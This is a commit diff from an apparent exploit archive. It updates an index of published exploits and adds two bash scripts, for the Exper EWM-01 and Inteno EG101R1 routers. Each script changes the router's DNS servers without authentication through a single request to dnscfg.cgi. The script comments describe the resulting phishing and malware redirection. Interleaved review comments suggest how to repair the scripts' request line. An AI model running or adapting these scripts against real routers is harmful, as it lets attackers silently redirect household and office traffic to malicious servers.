DB: 2016-09-14
17 new exploits
Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script
Cherry Music 0.35.1 - Arbitrary File Disclosure
Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation
Windows x86 - Password Protected TCP Bind Shell (637 bytes)
wdCalendar 2 - SQL Injection
Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation
Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change
Open-Xchange App Suite 7.8.2 - Cross Site Scripting
Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting
Multiple Icecream Apps - Insecure File Permissions Privilege Escalation
WinSMS 3.43 - Insecure File Permissions Privilege Escalation
Microsoft Internet Explorer 11.0.9600.18482 - Use After Free
AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure
AIOCP 1.3.x - Multiple Vulnerabilities
ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change
COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change
Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change
PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change
PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change
Inteno EG101R1 VoIP Router - Unauthenticated DNS Change
This commit is contained in:
parent
28e25eeea1
commit
d5138d6962
21 changed files with 1943 additions and 15 deletions
20
files.csv
|
@ -17745,7 +17745,6 @@ id,file,description,date,author,platform,type,port
|
|||
20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
|
||||
20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
|
||||
20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
|
||||
20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0
|
||||
20416,platforms/php/webapps/20416.txt,"WordPress Plugin Mz-jajak 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0
|
||||
20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
|
||||
20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
|
||||
|
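Review bot: the header `@ -17745,7 +17745,6` says this hunk drops exactly one line, but the rendered view has lost the `+`/`-` markers, so the dropped row is not visible. Id 20415 is missing between 20414 and 20416, and the `20424` Windows Media Player row sits out of id order in that gap with a 2000-11-22 date, so confirm that 20415 is the removed line and that 20424, which the commit summary lists as a new exploit, already exists elsewhere in files.csv rather than being re-added here.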
@ -18949,6 +18948,12 @@ id,file,description,date,author,platform,type,port
|
|||
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
|
||||
21671,platforms/unix/remote/21671.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
|
||||
40347,platforms/unix/remote/40347.txt,"Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
|
||||
40361,platforms/php/webapps/40361.py,"Cherry Music 0.35.1 - Arbitrary File Disclosure",2016-09-13,feedersec,php,webapps,80
|
||||
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
|
||||
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
|
||||
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
|
||||
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
|
||||
21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
|
||||
|
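Review bot: the six new rows (40361, 40362, 40363, 40364, 40365, 40367) are inserted between 21671 and 21673, next to the pre-existing 40347 context row, rather than appended in id order, and id 40366 is skipped (40367 follows 40365 directly); if 40366 is a held-back entry that is fine, otherwise the numbering should be contiguous. Note also that 21672 does not appear in this context window, which may be a pre-existing removal worth checking.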
@ -25454,6 +25459,7 @@ id,file,description,date,author,platform,type,port
|
|||
28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
|
||||
28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - TSUserEX.dll ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0
|
||||
28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0
|
||||
40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
|
||||
28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0
|
||||
28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
|
||||
28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
|
||||
|
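Review bot: the author field of the new 40378 row reads `"Jakub A>>oczek"`, which looks like UTF-8 `Ż` (bytes C5 BB, displayed as `Å»` under Latin-1) mangled to `A>>`; the CSV should carry the name as proper UTF-8. The row is also filed among 2006 entries (28401/28402) with platform `linux` for a web-application XSS, whereas neighbouring webapps rows key the platform on the application stack (php, jsp); check which convention applies before merging.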
@ -25565,6 +25571,7 @@ id,file,description,date,author,platform,type,port
|
|||
28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - rightbar.php suser Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
|
||||
28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - open_tickets.php ticket_id Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
|
||||
28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
|
||||
40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0
|
||||
28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0
|
||||
28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0
|
||||
28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
|
||||
|
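Review bot: 40377 (Open-Xchange Guard XSS) is filed with platform `linux`, type `webapps`, port 0, while the surrounding webapps rows use the language as platform and the other new webapps rows in this commit (40361, 40364) carry port 80; the two Open-Xchange rows should at least agree with each other and with the rest of the webapps entries so that platform and port searches return them.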
@ -25658,6 +25665,7 @@ id,file,description,date,author,platform,type,port
|
|||
28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0
|
||||
28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0
|
||||
28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0
|
||||
40376,platforms/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - updateuser Servlet in_name Parameter Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps,0
|
||||
28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 - imgen.php Root Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0
|
||||
28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - admin/config.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0
|
||||
|
@ -25727,6 +25735,7 @@ id,file,description,date,author,platform,type,port
|
|||
28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
|
||||
28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
|
||||
28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
|
||||
40375,platforms/windows/local/40375.txt,"WinSMS 3.43 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",multiple,remote,0
|
||||
28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",multiple,dos,0
|
||||
28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0
|
||||
|
@ -25900,6 +25909,7 @@ id,file,description,date,author,platform,type,port
|
|||
28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
|
||||
28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0
|
||||
28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0
|
||||
40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0
|
||||
28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0
|
||||
28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0
|
||||
28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0
|
||||
|
@ -25973,7 +25983,7 @@ id,file,description,date,author,platform,type,port
|
|||
28932,platforms/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28933,platforms/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28934,platforms/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - Multiple Vulnerabilities",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28936,platforms/php/webapps/28936.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0
|
||||
|
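Review bot: the header `@ -25973,7 +25983,7` shows a one-for-one replacement, and the two 28935 rows share id, file and date, so this hunk retitles `AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure` to `AIOCP 1.3.x - Multiple Vulnerabilities` (or the reverse) rather than adding an entry; the commit summary lists both titles as separate new exploits and should record only the retitle. Since 28936 and 28937 keep their specific `cp_show_ec_products.php` / `cp_show_page_help.php` titles, confirm that the generic title is the intended direction.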
@ -26030,6 +26040,7 @@ id,file,description,date,author,platform,type,port
|
|||
28990,platforms/asp/webapps/28990.txt,"INFINICART - sendpassword.asp email Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
28991,platforms/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
28992,platforms/asp/webapps/28992.txt,"INFINICART - browse_group.asp groupid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
40373,platforms/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp ProductID Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
28994,platforms/asp/webapps/28994.txt,"INFINICART - browsesubcat.asp Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
28995,platforms/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80
|
||||
|
@ -26137,6 +26148,7 @@ id,file,description,date,author,platform,type,port
|
|||
29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
|
||||
29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
|
||||
29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0
|
||||
40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0
|
||||
29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0
|
||||
29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
|
||||
|
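Review bot: the 40372 description `COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03` has a trailing `_ ` after `C01_R12` where a separator between the two model/firmware pairs appears to have been replaced; the PIKATEL row in this commit shows the same pattern (`96338WS_ 96338L-2M-8M` in the CSV against a comma in its script header), so the intended form is probably `CT-5367 C01_R12 / CT-5624 C01_R03`. The field is double-quoted, so a comma would also be safe.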
@ -26232,6 +26244,7 @@ id,file,description,date,author,platform,type,port
|
|||
29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0
|
||||
29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - _404_not_found.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
|
||||
29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - _410_stats_gone.page.php app_name Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
|
||||
40371,platforms/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - _referer_spam.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
|
||||
29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
|
||||
29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - polls.php SQL Injection",2006-11-30,ajann,php,webapps,0
|
||||
|
@ -26341,6 +26354,7 @@ id,file,description,date,author,platform,type,port
|
|||
29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0
|
||||
29332,platforms/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0
|
||||
29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - Grup Variable SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0
|
||||
40370,platforms/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29334,platforms/cfm/webapps/29334.txt,"Future Internet - index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0
|
||||
29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0
|
||||
29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0
|
||||
|
@ -26423,6 +26437,7 @@ id,file,description,date,author,platform,type,port
|
|||
29413,platforms/php/webapps/29413.txt,"Magic Photo Storage Website - admin/delete_member.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
29414,platforms/php/webapps/29414.txt,"Magic Photo Storage Website - admin/index.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
29415,platforms/php/webapps/29415.txt,"Magic Photo Storage Website - admin/list_members.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
40369,platforms/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29416,platforms/php/webapps/29416.txt,"Magic Photo Storage Website - admin/membership_pricing.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
29417,platforms/php/webapps/29417.txt,"Magic Photo Storage Website - admin/send_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
29418,platforms/php/webapps/29418.txt,"Magic Photo Storage Website - include/config.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
|
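Review bot: the 40369 description `PIKATEL 96338WS_ 96338L-2M-8M` does not match the header of the script it points to, which reads `PIKATEL 96338WS, 96338L-2M-8M` (line 3 of 40369.sh in this commit); the `_ ` looks like a comma escaped for the CSV, but the field is already double-quoted, so the comma can stay, or use `96338WS / 96338L-2M-8M` for consistency with other multi-model descriptions.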
@ -26493,6 +26508,7 @@ id,file,description,date,author,platform,type,port
|
|||
29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
|
||||
29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal Information Disclosure",2007-01-17,DPR,windows,remote,0
|
||||
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
|
||||
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
|
||||
29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0
|
||||
29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal",2007-01-18,"Elliot Kendall",linux,remote,0
|
||||
82
platforms/cgi/webapps/40367.sh
Executable file
|
@ -0,0 +1,82 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Exper EWM-01 ADSL/MODEM
|
||||
# Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " Exper EWM-01 ADSL MODEM/ROUTER"
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
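Review bot: the final request line is mis-redirected: in `GET -e "http://$1/dnscfg.cgi?..." 0&> /dev/null <&1`, bash reads `0&>` as the word `0` followed by `&>`, so `0` is passed to GET as an extra argument (lwp-request treats trailing words as further URLs) and `<&1` then points stdin at /dev/null; the intended form is `>/dev/null 2>&1`, and with the status discarded as well the script cannot distinguish a failed request from a successful one. The libwww-perl check works because `GET=\`which GET 2>/dev/null\`` returns the substitution's exit status, but `$GET` is never used afterwards and `command -v GET` is the portable spelling. Both `exit;` statements (usage error, missing libwww-perl) should be `exit 1` so callers see a non-zero status. Style: "The vulnerability exist" should read "exists", and "This or previous programs is" should be "are"; these same header and body lines are repeated verbatim in 40368.sh, 40369.sh, 40370.sh and 40371.sh, which differ only in the banner strings, so one script parameterised by model would avoid fixing the same defects five times.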
82
platforms/cgi/webapps/40368.sh
Executable file
|
@ -0,0 +1,82 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Inteno EG101R1 VoIP Router
|
||||
# Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " Inteno EG101R1 VoIP Router "
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
